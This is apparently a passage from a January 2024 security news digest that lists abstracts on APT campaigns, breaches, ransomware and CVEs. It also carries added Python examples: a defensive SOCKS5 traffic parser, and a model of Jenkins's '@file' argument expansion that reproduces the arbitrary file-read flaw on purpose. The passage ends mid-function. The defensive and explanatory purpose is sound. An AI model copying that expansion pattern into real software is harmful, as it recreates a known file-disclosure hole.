
January, 2024

January 31, 2024 – APT

Pawn Storm Uses Brute Force and Stealth Against High-Value Targets Full Text

Abstract Pawn Storm, aka APT28 and Forest Blizzard, has been employing anonymization layers, such as VPN services and compromised EdgeOS routers, to hide its tracks and carry out sophisticated attacks.

Cyware

January 31, 2024 – Phishing

New Evasive Large-Scale Scareware and PUP Delivery Campaign Spotted Full Text

Abstract Unit 42 researchers discovered a large-scale campaign dubbed ApateWeb, which uses over 130,000 domains to distribute scareware, potentially unwanted programs (PUPs), and other scam pages.

Cyware

January 31, 2024 – Vulnerabilities

RunC Flaws Enable Container Escapes, Granting Attackers Host Access Full Text

Abstract Multiple security vulnerabilities have been disclosed in the runC command line tool that could be exploited by threat actors to escape the bounds of the container and stage follow-on attacks. The vulnerabilities, tracked as CVE-2024-21626, CVE-2024-23651, CVE-2024-23652, and CVE-2024-23653, have been collectively dubbed Leaky Vessels by cybersecurity vendor Snyk. "These container escapes could allow an attacker to gain unauthorized access to the underlying host operating system from within the container and potentially permit access to sensitive data (credentials, customer info, etc.), and launch further attacks, especially when the access gained includes superuser privileges," the company said in a report shared with The Hacker News. runC is a tool for spawning and running containers on Linux. It was originally developed as part of Docker and later spun out into a separate open-source library in 2015. A brief description of each of the flaws is below - CVE-202

The Hacker News

January 31, 2024 – Breach

Data Leak at Fintech Giant Direct Trading Technologies Full Text

Abstract The leaked information included names, email addresses, trading activity, passwords, and other personal details. Additionally, the company's outreach team's internal comments were exposed.

Cyware

January 31, 2024 – Vulnerabilities

Alert: Ivanti Discloses 2 New Zero-Day Flaws, One Under Active Exploitation Full Text

Abstract Ivanti is alerting of two new high-severity flaws in its Connect Secure and Policy Secure products, one of which is said to have come under targeted exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-21888 (CVSS score: 8.8) - A privilege escalation vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows a user to elevate privileges to that of an administrator. CVE-2024-21893 (CVSS score: 8.2) - A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication. The Utah-based software company said it found no evidence of customers being impacted by CVE-2024-21888 so far, but acknowledged "the exploitation of CVE-2024-21893 appears to be targeted" and that it's "aware of a limited number of cust

The Hacker News

January 31, 2024 – Vulnerabilities

Vulnerabilities in Lamassu Bitcoin ATMs Full Text

Abstract The attack, IOActive explains, was possible due to a vulnerability in the ATM’s software update mechanism that could allow an attacker to supply their own malicious file and trigger legitimate processes for code execution.

Cyware

January 31, 2024 – Phishing

Telegram Marketplaces Fuel Phishing Attacks with Easy-to-Use Kits and Malware Full Text

Abstract Cybersecurity researchers are calling attention to the "democratization" of the phishing ecosystem owing to the emergence of Telegram as an epicenter for cybercrime, enabling threat actors to mount a mass attack for as little as $230. "This messaging app has transformed into a bustling hub where seasoned cybercriminals and newcomers alike exchange illicit tools and insights creating a dark and well-oiled supply chain of tools and victims' data," Guardio Labs researchers Oleg Zaytsev and Nati Tal said in a new report. "Free samples, tutorials, kits, even hackers-for-hire – everything needed to construct a complete end-to-end malicious campaign." The company also described Telegram as a "scammers paradise" and a "breeding ground for modern phishing operations." This is not the first time the popular messaging platform has come under the radar for facilitating malicious activities, which are in part driven by its lenient modera

The Hacker News

January 31, 2024 – General

Great Security or Great UX? Both, Please Full Text

Abstract Security step-ups should only be used for higher-risk scenarios and should be implemented in a user-friendly manner to maintain a balance between security and user experience.

Cyware

January 31, 2024 – Policy and Law

The SEC Won’t Let CISOs Be: Understanding New SaaS Cybersecurity Rules Full Text

Abstract The SEC isn't giving SaaS a free pass. Applicable public companies, known as "registrants," are now subject to cyber incident disclosure and cybersecurity readiness requirements for data stored in SaaS systems, along with the 3rd and 4th party apps connected to them. The new cybersecurity mandates make no distinction between data exposed in a breach that was stored on-premise, in the cloud, or in SaaS environments. In the SEC's own words: "We do not believe that a reasonable investor would view a significant data breach as immaterial merely because the data are housed on a cloud service." This evolving approach comes as SaaS security shortcomings continually make headlines and tech leaders debate how the SEC may change cybersecurity after charging both SolarWinds and its CISO with fraud. Why SaaS and SaaS-to-SaaS Connection Risks Matter to the SEC — And To Your Organization: The perception and reality of SaaS security are, in many cases, miles apart. SaaS security leader App

The Hacker News

January 31, 2024 – Outage

Fulton County Cyberattack Brings Down Phones, Court Site and Tax Systems Full Text

Abstract An ongoing cyberattack against Georgia’s Fulton County, which includes parts of Atlanta, has brought some of the government’s systems to a standstill, halting access to court filings, tax processing, and other services.

Cyware

January 30, 2024 – Criminals

Threat Actors Selling 1.8TB Database of 750 Million Indian Mobile Users Full Text

Abstract The compromised database is being sold on hacker forums, with two cybercrime groups offering the data for sale, highlighting the growing threat posed by emerging threat groups like CYBO CREW and its affiliates.

Cyware

January 30, 2024 – Criminals

Brazilian Feds Dismantle Grandoreiro Banking Trojan, Arresting Top Operatives Full Text

Abstract A Brazilian law enforcement operation has led to the arrest of several Brazilian operators in charge of the Grandoreiro malware. The Federal Police of Brazil said it served five temporary arrest warrants and 13 search and seizure warrants in the states of São Paulo, Santa Catarina, Pará, Goiás, and Mato Grosso. Slovak cybersecurity firm ESET, which provided additional assistance in the effort, said it uncovered a design flaw in Grandoreiro's network protocol that helped it to identify the victimology patterns. Grandoreiro is one of the many Latin American banking trojans such as Javali, Melcoz, Casabeniero, Mekotio, and Vadokrist, primarily targeting countries like Spain, Mexico, Brazil, and Argentina. It's known to be active since 2017. In late October 2023, Proofpoint revealed details of a phishing campaign that distributed an updated version of the malware to targets in Mexico and Spain. The banking trojan has capabilities to both steal data through keyloggers

The Hacker News

January 30, 2024 – Breach

Hundreds of Network Operators’ Credentials Found Circulating in Dark Web Full Text

Abstract A significant number of network administrators and IT personnel were found to have their credentials compromised, highlighting the vulnerability of staff involved in network engineering and IT management operations.

Cyware

January 30, 2024 – Vulnerabilities

URGENT: Upgrade GitLab - Critical Workspace Creation Flaw Allows File Overwrite Full Text

Abstract GitLab once again released fixes to address a critical security flaw in its Community Edition (CE) and Enterprise Edition (EE) that could be exploited to write arbitrary files while creating a workspace. Tracked as CVE-2024-0402, the vulnerability has a CVSS score of 9.9 out of a maximum of 10. "An issue has been discovered in GitLab CE/EE affecting all versions from 16.0 prior to 16.5.8, 16.6 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 which allows an authenticated user to write files to arbitrary locations on the GitLab server while creating a workspace," GitLab said in an advisory released on January 25, 2024. The company also noted patches for the bug have been backported to 16.5.8, 16.6.6, 16.7.4, and 16.8.1. Also resolved by GitLab are four medium-severity flaws that could lead to a regular expression denial-of-service (ReDoS), HTML injection, and the disclosure of a user's public email address via the tags RSS feed. The latest updat

The Hacker News

January 30, 2024 – Business

Dynatrace Acquires Runecast to Improve Cloud-Native Security Full Text

Abstract Dynatrace's acquisition of Runecast will enhance its platform with AI-powered security posture management for proactive risk mitigation and real-time vulnerability assessments in hybrid and multicloud environments.

Cyware

January 30, 2024 – Attack

Ukraine’s Prisoners of War Agency Hit by Cyberattack Full Text

Abstract Ukraine's Coordination Headquarters for Prisoners of War faced a DDoS attack, suspected to be linked to the recent crash of a Russian transport plane carrying Ukrainian prisoners and Russian servicemen.

Cyware

January 30, 2024 – Attack

China-Linked Hackers Target Myanmar’s Top Ministries with Backdoor Blitz Full Text

Abstract The China-based threat actor known as Mustang Panda is suspected to have targeted Myanmar's Ministry of Defence and Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans. The findings come from CSIRT-CTI, which said the activities took place in November 2023 and January 2024 after artifacts in connection with the attacks were uploaded to the VirusTotal platform. "The most prominent of these TTPs are the use of legitimate software including a binary developed by engineering firm Bernecker & Rainer (B&R) and a component of the Windows 10 upgrade assistant to sideload malicious dynamic-link libraries (DLLs)," CSIRT-CTI said. Mustang Panda, active since at least 2012, is also recognized by the cybersecurity community under the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, Red Lich, Stately Taurus, and TEMP.Hex. In recent months, the adversary has been attributed to attacks targeting

The Hacker News

January 30, 2024 – Breach

US Aid Office in Colombia Reports Its Facebook Page was Hacked Full Text

Abstract The unauthorized access to the USAID Colombia Facebook page posed a potential risk, prompting the agency to actively work on restoring account security and investigating the extent of the breach.

Cyware

January 30, 2024 – General

Top Security Posture Vulnerabilities Revealed Full Text

Abstract Each New Year introduces a new set of challenges and opportunities for strengthening our cybersecurity posture. It's the nature of the field – the speed at which malicious actors carry out advanced persistent threats brings a constant, evolving battle for cyber resilience. The excitement in cybersecurity lies in this continuous adaptation and learning, always staying one step ahead of potential threats. As practitioners in an industry that operates around-the-clock, this hypervigilance becomes second nature. We are always in a constant state of readiness, anticipating the next move, adapting strategies, and counteracting threats. However, it remains just as crucial to have our fingers on the pulse of the most common vulnerabilities impacting security postures right now. Why? Knowing these weak points is not just about defense; it's about ensuring robust, uninterrupted business continuity in an environment where risks are always around the corner. The Importance of Regularl

The Hacker News

January 30, 2024 – Breach

Mistakenly Published Authentication Token Exposed Mercedes-Benz Source Code Full Text

Abstract The exposure was discovered by RedHunt Labs, which found an employee's authentication token in a public GitHub repository. It could be used to access other private repositories containing cloud access keys, design documents, and source code.

Cyware

January 30, 2024 – Privacy

Italian Data Protection Watchdog Accuses ChatGPT of Privacy Violations Full Text

Abstract Italy's data protection authority (DPA) has notified ChatGPT-maker OpenAI of supposedly violating privacy laws in the region. "The available evidence pointed to the existence of breaches of the provisions contained in the E.U. GDPR [General Data Protection Regulation]," the Garante per la protezione dei dati personali (aka the Garante) said in a statement on Monday. It also said it will "take account of the work in progress within the ad-hoc task force set up by the European Data Protection Framework (EDPB) in its final determination on the case." The development comes nearly 10 months after the watchdog imposed a temporary ban on ChatGPT in the country, weeks after which OpenAI announced a number of privacy controls, including an opt-out form to remove one's personal data from being processed by the large language model (LLM). Access to the tool was subsequently reinstated in late April 2023. The Italian DPA said the latest findings, which h

The Hacker News

January 30, 2024 – Breach

Insurance Broker Notifying 1.5 Million of Health Information Hack Full Text

Abstract Keenan & Associates, a California insurance broker, is notifying over 1.5 million individuals about a hacking incident in August 2023. The attack compromised personal and health information, including passport numbers and Social Security numbers.

Cyware

January 30, 2024 – Malware

New ZLoader Malware Variant Surfaces with 64-bit Windows Compatibility Full Text

Abstract Threat hunters have identified a new campaign that delivers the ZLoader malware, resurfacing nearly two years after the botnet's infrastructure was dismantled in April 2022. A new variant of the malware is said to have been in development since September 2023, Zscaler ThreatLabz said in an analysis published this month. "The new version of Zloader made significant changes to the loader module, which added RSA encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time," researchers Santiago Vicente and Ismael Garcia Perez said. ZLoader, also known by the names Terdot, DELoader, or Silent Night, is an offshoot of the Zeus banking trojan that first surfaced in 2015, before pivoting to functioning as a loader for next-stage payloads, including ransomware. Typically distributed via phishing emails and malicious search engine ads, ZLoader suffered a huge blow after a group of companies led by Micros

The Hacker News

January 30, 2024 – Outage

Cactus Ransomware Gang Claims the Schneider Electric Hack Full Text

Abstract Schneider Electric suffered a data breach from a Cactus ransomware attack, impacting their Sustainability Business division and causing outages on the Resource Advisor cloud platform.

Cyware

January 30, 2024 – Phishing

Exploring Telegram’s Dark Markets, Breeding Ground for Modern Phishing Operations Full Text

Abstract The phishing ecosystem has shifted from exclusive Dark web forums to public Telegram channels, making illicit tools and stolen data easily accessible to both seasoned cybercriminals and newcomers.

Cyware

January 29, 2024 – Education

493 Companies Share Their SaaS Security Battles – Get Insights in this Webinar Full Text

Abstract In today's digital world, security risks are more prevalent than ever, especially when it comes to Software as a Service (SaaS) applications. Did you know that an alarming 97% of companies face serious risks from unsecured SaaS applications? Moreover, about 20% of these organizations are struggling with internal data threats. These statistics aren't just numbers; they're a wake-up call. We're excited to invite you to a not-to-be-missed webinar, "Critical SaaS Security Do's and Don'ts: Insights from 493 Companies," with Ran Senderovitz, the Chief Operating Officer of Wing Security. Ran isn't just going to talk about the problems; he's going to dive deep into the realities of SaaS security, backed by extensive research and data analysis from almost 500 companies using SaaS. Here's What This Webinar Offers: Insights Across Data, SaaS Applications, Users, and AI: Explore a comprehensive analysis of the statistics about SaaS security, di

The Hacker News

January 29, 2024 – Business

Bastille Raises $44M Series C Investment Led by Goldman Sachs Asset Management Full Text

Abstract Bastille Networks, Inc. has secured a $44 million Series C investment led by Growth Equity at Goldman Sachs Asset Management, with participation from existing investor Bessemer Venture Partners.

Cyware

January 29, 2024 – Vulnerabilities

Researchers Uncover How Outlook Vulnerability Could Leak Your NTLM Passwords Full Text

Abstract A now-patched security flaw in Microsoft Outlook could be exploited by threat actors to access NT LAN Manager (NTLM) v2 hashed passwords when opening a specially crafted file. The issue, tracked as CVE-2023-35636 (CVSS score: 6.5), was addressed by the tech giant as part of its Patch Tuesday updates for December 2023. "In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file," Microsoft said in an advisory released last month. "In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability." Put differently, the adversary would have to convince users to click a link, either embedded in a phishing email or sent via an instant message, and then deceive them into opening the file in question. CVE-2023-3563

The Hacker News

January 29, 2024 – Outage

Data Theft Plaguing K-12 Schools After Holiday Season Attacks Full Text

Abstract Ransomware attacks have affected schools like Ohio’s Groveport Madison Schools, causing disruptions to internet access and damage to devices, but efforts to restore systems and minimize data theft have been successful.

Cyware

January 29, 2024 – Policy and Law

A TrickBot malware developer sentenced to 64 months in prison Full Text

Abstract Vladimir Dunaev was extradited to the US in October 2021 and pleaded guilty to charges related to computer fraud and identity theft. He developed malicious tools that aided in data theft and fraud, resulting in millions of dollars in losses.

Cyware

January 29, 2024 – General

Riding the AI Waves: The Rise of Artificial Intelligence to Combat Cyber Threats Full Text

Abstract In nearly every segment of our lives, AI (artificial intelligence) now makes a significant impact: It can deliver better healthcare diagnoses and treatments; detect and reduce the risk of financial fraud; improve inventory management; and serve up the right recommendation for a streaming movie on Friday night. However, one can also make a strong case that some of AI's most significant impacts are in cybersecurity. AI's ability to learn, adapt, and predict rapidly evolving threats has made it an indispensable tool in protecting the world's businesses and governments. From basic applications like spam filtering to advanced predictive analytics and AI-assisted response, AI serves a critical role on the front lines, defending our digital assets from cyber criminals. The future for AI in cybersecurity is not all rainbows and roses, however. Today we can see the early signs of a significant shift, driven by the democratization of AI technology. While AI continues to empower organizations

The Hacker News

January 29, 2024 – Government

Saudi Arabia Boosts Railway Cybersecurity Full Text

Abstract The railway network, spanning 4,500 kilometers in Saudi Arabia, faces challenges in securing its legacy and modern technologies, especially with the introduction of IoT signaling and communication systems.

Cyware

January 29, 2024 – Ransomware

Albabat, Kasseika, Kuiper: New Ransomware Gangs Rise with Rust and Golang Full Text

Abstract Cybersecurity researchers have detected in the wild yet another variant of the Phobos ransomware family known as Faust. Fortinet FortiGuard Labs, which detailed the latest iteration of the ransomware, said it's being propagated by means of an infection that delivers a Microsoft Excel document (.XLAM) containing a VBA script. "The attackers utilized the Gitea service to store several files encoded in Base64, each carrying a malicious binary," security researcher Cara Lin said in a technical report published last week. "When these files are injected into a system's memory, they initiate a file encryption attack." Faust is the latest addition to several ransomware variants from the Phobos family, including Eking, Eight, Elbie, Devos, and 8Base. It's worth noting that Faust was previously documented by Cisco Talos in November 2023. The cybersecurity firm described the variant as active since 2022 and "does not target specific industries or re

The Hacker News

January 29, 2024 – Breach

Update: In Major Lapse, Hacked Microsoft Test Account was Assigned Admin Privileges Full Text

Abstract The hackers who recently broke into Microsoft’s network and monitored top executives’ email for two months did so by gaining access to an aging test account with administrative privileges, a major lapse on the company's part, a researcher said.

Cyware

January 29, 2024 – Privacy

NSA Admits Secretly Buying Your Internet Browsing Data without Warrants Full Text

Abstract The U.S. National Security Agency (NSA) has admitted to buying internet browsing records from data brokers to identify the websites and apps Americans use that would otherwise require a court order, U.S. Senator Ron Wyden said last week. "The U.S. government should not be funding and legitimizing a shady industry whose flagrant violations of Americans' privacy are not just unethical, but illegal," Wyden said in a letter to the Director of National Intelligence (DNI), Avril Haines, in addition to urging the government to take steps to "ensure that U.S. intelligence agencies only purchase data on Americans that has been obtained in a lawful manner." Metadata about users' browsing habits can pose a serious privacy risk, as the information could be used to glean personal details about an individual based on the websites they frequent. This could include websites that offer resources related to mental health, assistance for survivors of sexual assault or do

The Hacker News

January 29, 2024 – Criminals

Who is Alleged Medibank Hacker Aleksandr Ermakov? Full Text

Abstract Aleksandr Ermakov, a Russian cybercriminal, has been sanctioned by Australia, the UK, and the US for his alleged involvement in the Medibank data breach and his ties to the REvil ransomware group.

Cyware

January 29, 2024 – Malware

Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines Full Text

Abstract Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information stealing malware called WhiteSnake Stealer on Windows systems. The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS." "These packages incorporate Base64-encoded source code of PE or other Python scripts within their setup.py files," Fortinet FortiGuard Labs said in an analysis published last week. "Depending on the victim devices' operating system, the final malicious payload is dropped and executed when these Python packages are installed." While Windows systems are infected with WhiteSnake Stealer, compromised Linux hosts are served a Python script designed to harvest information. The activity, which predominantly targets Windows users, overlaps with a prior campaign that JFrog

The Hacker News

January 29, 2024 – General

Using Google Search to Find Software can be Risky Full Text

Abstract Despite Google's efforts to enforce abuse policies and remove malicious ads, cybercrooks are finding new ways to evade detection and continue to lead users to malware-infected websites.

Cyware

January 27, 2024 – Vulnerabilities

Update: Nearly 800 GoAnywhere Instances are Unpatched, Exposed to Critical CVE Full Text

Abstract The majority of GoAnywhere MFT admin interfaces running on default port settings are hosted in the U.S., with more than 3 in 5 publicly exposed instances hosted on cloud networks operated by Amazon, Microsoft, and Google.

Cyware

January 27, 2024 – Breach

Therapy Provider Notifying 4 Million Patients of PJ&A Hack Full Text

Abstract The breach has impacted at least 14 million patients across various organizations. The hack prompted a warning from New York's attorney general about potential identity theft and fraud risks.

Cyware

January 27, 2024 – Malware

AllaKore RAT Malware Targeting Mexican Firms with Financial Fraud Tricks Full Text

Abstract Mexican financial institutions are under the radar of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT. The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021. "Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process," the Canadian company said in an analysis published earlier this week. "The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud." The attacks appear to be designed to particularly single out large companies with gross revenues over $100 million. Targeted entities span retail, agriculture, pub

The Hacker News

January 27, 2024 – Privacy

Pegasus Spyware Targets Togolese Journalists’ Mobile Devices Full Text

Abstract The spyware intrusions occurred on the phones of multiple journalists, including the publisher of an independent weekly paper, raising concerns about press freedom and privacy violations in the country.

Cyware

January 27, 2024 – Criminals

Update: Akira Ransomware Gang Says It Stole Passport Scans From Lush Full Text

Abstract The Akira ransomware gang has claimed responsibility for a cybersecurity incident at a British bath bomb merchant. They have stolen 110 GB of data, including personal documents such as passport scans, from the global cosmetics giant.

Cyware

January 27, 2024 – Attack

Mexican Banks and Cryptocurrency Platforms Targeted With AllaKore RAT Full Text

Abstract A financially motivated threat actor based in Latin America is targeting large Mexican companies with custom packaged installers delivering a modified version of AllaKore RAT for financial fraud.

Cyware

January 26, 2024 – Solution

Perfecting the Defense-in-Depth Strategy with Automation Full Text

Abstract Medieval castles stood as impregnable fortresses for centuries, thanks to their meticulous design. Fast forward to the digital age, and this medieval wisdom still echoes in cybersecurity. Like castles with strategic layouts to withstand attacks, the Defense-in-Depth strategy is the modern counterpart — a multi-layered approach with strategic redundancy and a blend of passive and active security controls. However, the evolving cyber threat landscape can challenge even the most fortified defenses. Despite the widespread adoption of the Defense-in-Depth strategy, cyber threats persist. Fortunately, the Defense-in-Depth strategy can be augmented using Breach and Attack Simulation (BAS), an automated tool that assesses and improves every security control in each layer. Defense-in-Depth: False Sense of Security with Layers. Also known as multi-layered defense, the defense-in-depth strategy has been widely adopted by organizations since the early 2000s. It's based on the assumption that a

The Hacker News

January 26, 2024 – Phishing

Malicious Ads on Google Target Chinese Users with Fake Messaging Apps Full Text

Abstract Chinese-speaking users have been targeted by malicious Google ads for restricted messaging apps like Telegram as part of an ongoing malvertising campaign. "The threat actor is abusing Google advertiser accounts to create malicious ads and pointing them to pages where unsuspecting users will download Remote Administration Trojan (RATs) instead," Malwarebytes' Jérôme Segura said in a Thursday report. "Such programs give an attacker full control of a victim's machine and the ability to drop additional malware." It's worth noting that the activity, codenamed FakeAPP, is a continuation of a prior attack wave that targeted Hong Kong users searching for messaging apps like WhatsApp and Telegram on search engines in late October 2023. The latest iteration of the campaign also adds messaging app LINE to the list of messaging apps, redirecting users to bogus websites hosted on Google Docs or Google Sites. The Google infrastructure is used to embed link

The Hacker News

January 26, 2024 – APT

Microsoft Warns of Widening APT29 Espionage Attacks Targeting Global Orgs Full Text

Abstract Microsoft on Thursday said the Russian state-sponsored threat actors responsible for a cyber attack on its systems in late November 2023 have been targeting other organizations and that it's currently beginning to notify them. The development comes a day after Hewlett Packard Enterprise (HPE) revealed that it had been the victim of an attack perpetrated by a hacking crew tracked as APT29, which is also known as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. "This threat actor is known to primarily target governments, diplomatic entities, non-governmental organizations (NGOs) and IT service providers, primarily in the U.S. and Europe," the Microsoft Threat Intelligence team said in a new advisory. The primary goal of these espionage missions is to gather sensitive information that is of strategic interest to Russia by maintaining footholds for extended periods of time without attracting any attention. The latest disc

The Hacker News

January 26, 2024 – Phishing

Abu Dhabi Investment Firm Warns About Scam Efforts Full Text

Abstract The National Investor in Abu Dhabi has issued a warning about fraudulent investment schemes misusing its name, logo, and employees' identities to solicit personal and financial information.

Cyware

January 26, 2024 – Policy and Law

Russian TrickBot Mastermind Gets 5-Year Prison Sentence for Cybercrime Spree Full Text

Abstract 40-year-old Russian national Vladimir Dunaev has been sentenced to five years and four months in prison for his role in creating and distributing the TrickBot malware, the U.S. Department of Justice (DoJ) said. The development comes nearly two months after Dunaev pleaded guilty to committing computer fraud and identity theft and conspiracy to commit wire fraud and bank fraud. "Hospitals, schools, and businesses were among the millions of TrickBot victims who suffered tens of millions of dollars in losses," DoJ said. "While active, TrickBot malware, which acted as an initial intrusion vector into victim computer systems, was used to support various ransomware variants." Originating as a banking trojan in 2016, TrickBot evolved into a Swiss Army knife capable of delivering additional payloads, including ransomware. Following efforts to take down the botnet, it was absorbed into the Conti ransomware operation in 2022. The cybercrime crew's allegiance to

The Hacker News

January 26, 2024 – Government

Feds Warn Healthcare Sector of ConnectWise ScreenConnect Threats Full Text

Abstract Federal authorities warn that a self-hosted version of ConnectWise's ScreenConnect remote access tool was compromised at a large pharmacy services firm, posing a significant risk to other healthcare organizations.

Cyware

January 26, 2024 – Vulnerabilities

Critical Cisco Flaw Lets Hackers Remotely Take Over Unified Comms Systems Full Text

Abstract Cisco has released patches to address a critical security flaw impacting Unified Communications and Contact Center Solutions products that could permit an unauthenticated, remote attacker to execute arbitrary code on an affected device. Tracked as CVE-2024-20253 (CVSS score: 9.9), the issue stems from improper processing of user-provided data that a threat actor could abuse to send a specially crafted message to a listening port of a susceptible appliance. "A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user," Cisco said in an advisory. "With access to the underlying operating system, the attacker could also establish root access on the affected device." Synacktiv security researcher Julien Egloff has been credited with discovering and reporting CVE-2024-20253. The following products are impacted by the flaw - Unified Communications Manager (versions 11

The Hacker News

January 25, 2024 – General

Cybercrime Researcher Examines the Ransomware Victim’s Mindset Full Text

Abstract The study by a cybercrime researcher at the University of Twente analyzed ransomware attacks in the Netherlands from 2019-2022, finding that companies working with incident response firms were most likely to pay ransoms.

Cyware

January 25, 2024 – Malware

SystemBC Malware’s C2 Server Analysis Exposes Payload Delivery Tricks Full Text

Abstract Cybersecurity researchers have shed light on the command-and-control (C2) server of a known malware family called SystemBC. "SystemBC can be purchased on underground marketplaces and is supplied in an archive containing the implant, a command-and-control (C2) server, and a web administration portal written in PHP," Kroll said in an analysis published last week. The risk and financial advisory solutions provider said it has witnessed an increase in the use of the malware throughout Q2 and Q3 2023. SystemBC, first observed in the wild in 2018, allows threat actors to remotely control a compromised host and deliver additional payloads, including trojans, Cobalt Strike, and ransomware. It also supports launching ancillary modules on the fly to expand its core functionality. A standout aspect of the malware is its use of SOCKS5 proxies to mask network traffic to and from C2 infrastructure, acting as a persistent access mechanism for post-exploitat

The Hacker News
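Because the abstract above singles out SOCKS5 proxying as the feature that hides SystemBC's C2 traffic, an analyst triaging captured flows needs to recognise a SOCKS5 handshake when one appears. The following is an added example, not Kroll's tooling or SystemBC code: a minimal parser for the two client-side messages defined in RFC 1928 (the method-negotiation greeting and the CONNECT/BIND/UDP request), run over constructed sample bytes. Whether a given SystemBC build speaks plain SOCKS5 on the wire, or wraps it, is not established by the page; the parser is for flows where a standard handshake is visible.

```python
import ipaddress
import struct

SOCKS_VERSION = 5
COMMANDS = {1: "CONNECT", 2: "BIND", 3: "UDP_ASSOCIATE"}
AUTH_METHODS = {0: "NO_AUTH", 1: "GSSAPI", 2: "USERNAME_PASSWORD", 0xFF: "NO_ACCEPTABLE"}


def parse_greeting(data):
    """Parse the client greeting (VER | NMETHODS | METHODS...) and return the
    offered authentication methods by name. Raises ValueError if the bytes
    are not a well-formed SOCKS5 greeting."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 greeting")
    n_methods = data[1]
    if len(data) != 2 + n_methods:
        raise ValueError("method count does not match message length")
    return [AUTH_METHODS.get(m, f"UNKNOWN_{m}") for m in data[2:2 + n_methods]]


def parse_request(data):
    """Parse a SOCKS5 request (VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT)
    and return (command, host, port). The destination is what the proxied
    connection is really going to, which is the field worth logging."""
    if len(data) < 4 or data[0] != SOCKS_VERSION or data[2] != 0:
        raise ValueError("not a SOCKS5 request")
    cmd, atyp = data[1], data[3]
    if atyp == 1:        # IPv4, 4 octets
        host, rest = str(ipaddress.IPv4Address(data[4:8])), data[8:]
    elif atyp == 3:      # domain name, one length byte then the name
        length = data[4]
        host, rest = data[5:5 + length].decode("ascii"), data[5 + length:]
    elif atyp == 4:      # IPv6, 16 octets
        host, rest = str(ipaddress.IPv6Address(data[4:20])), data[20:]
    else:
        raise ValueError(f"unknown address type {atyp}")
    if len(rest) != 2:
        raise ValueError("bad port field")
    port = struct.unpack("!H", rest)[0]
    return COMMANDS.get(cmd, f"UNKNOWN_{cmd}"), host, port


# Constructed sample messages (not captured SystemBC traffic): a greeting that
# offers no-auth and username/password, then CONNECT requests to an IPv4
# address and to a domain name.
SAMPLE_GREETING = b"\x05\x02\x00\x02"
SAMPLE_CONNECT_IPV4 = b"\x05\x01\x00\x01" + bytes([192, 0, 2, 10]) + struct.pack("!H", 443)
SAMPLE_CONNECT_DOMAIN = b"\x05\x01\x00\x03" + bytes([11]) + b"example.com" + struct.pack("!H", 8080)

if __name__ == "__main__":
    print("greeting offers:", parse_greeting(SAMPLE_GREETING))
    print("request:", parse_request(SAMPLE_CONNECT_IPV4))
    print("request:", parse_request(SAMPLE_CONNECT_DOMAIN))
```

In a detection pipeline the useful signal is the pair of facts this yields: an internal host accepting or initiating SOCKS5 handshakes on a port where no proxy is expected, and the destination addresses in the CONNECT requests, which can be matched against C2 indicators directly rather than through the proxy's own address.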

January 25, 2024 – Outage

Major IT Outage Denies Happy Campers Their Caravan Holidays Full Text

Abstract Members have expressed concern over potential data compromise and lack of communication from CAMC about the nature of the problem, leading to speculation about a ransomware-related security breach.

Cyware

January 25, 2024 – Vulnerabilities

Critical Jenkins Vulnerability Exposes Servers to RCE Attacks - Patch ASAP! Full Text

Abstract The maintainers of the open-source continuous integration/continuous delivery and deployment (CI/CD) automation software Jenkins have resolved nine security flaws, including a critical bug that, if successfully exploited, could result in remote code execution (RCE). The issue, assigned the CVE identifier CVE-2024-23897, has been described as an arbitrary file read vulnerability through the built-in command line interface (CLI). "Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands," the maintainers said in a Wednesday advisory. "This command parser has a feature that replaces an @ character followed by a file path in an argument with the file's contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it." A threat actor could exploit this quirk to read arbitrary files on the Jenkins controller file system

The Hacker News
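The advisory quoted above describes the parser feature precisely enough to model: an argument beginning with @ is replaced by the contents of the file it names, on the server that parses the command. The following is an added example, not Jenkins or args4j code, that reproduces that behaviour in a small Python argument expander, shows the same call with the feature disabled (the mitigation the advisory describes), and adds a pre-check a CLI front end can use to refuse such arguments outright. Splitting the file into one argument per non-empty line is an assumption about how the expansion tokenises content; the leak is the same either way.

```python
import tempfile
from pathlib import Path


def expand_at_files(args, enabled=True):
    """Model of an args4j-style '@file' expansion step.

    When enabled, any argument of the form '@<path>' is replaced by the
    non-empty, stripped lines of that file (the expandAtFiles behaviour the
    advisory describes; one argument per line is an assumption of this model).
    With enabled=False, the mitigation, the token is passed through unchanged
    and the parser never touches the filesystem.
    """
    expanded = []
    for arg in args:
        if enabled and arg.startswith("@") and len(arg) > 1:
            content = Path(arg[1:]).read_text(encoding="utf-8")
            expanded.extend(line.strip() for line in content.splitlines() if line.strip())
        else:
            expanded.append(arg)
    return expanded


def reject_at_args(args):
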